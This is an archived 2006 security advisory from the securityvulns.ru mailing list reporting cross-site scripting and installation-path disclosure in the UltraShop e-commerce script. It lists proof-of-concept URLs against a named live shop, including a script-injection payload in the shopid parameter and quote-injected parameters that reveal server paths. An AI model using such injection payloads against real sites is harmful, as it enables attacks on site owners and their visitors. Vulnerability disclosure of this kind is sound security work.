Computer Security
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  [eVuln] Skull-Splitter's PHP Downloadcounter for Wallpapers SQL Injection

  [eVuln] Skull-Splitter's PHP Guestbook XSS Vulnerability

  XSS in PHPKIT Version 1.6.03

  [SA19443] PHP Script Index "search" Cross-Site Scripting Vulnerability

From:Cyber Lords <fear_(at)_cyberlords.net>
Date:29.03.2006
Subject:Xss in UltraShop

Advisory: Xss in UltraShop

Уязвимый скрипт/Vulnerable script: alertami.php

Xss:

http://www.comboutique.com/shop/alertami.php?shopid=2644"><script>a
lert()</script><"&prduid=44169

Раскрытие установочного пути/Exposure of installation path:

http://www.comboutique.com/shop/selectionnerproduit.php?shopid=2644&prduid=44
169&size=2&color=10
'&cmd=largeimage
http://www.comboutique.com/shop/vendre.php?I18N_COUNTRY=FR'

--------------------------
Cyber Lords Team
www.cyberlords.net  

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 



Rating@Mail.ru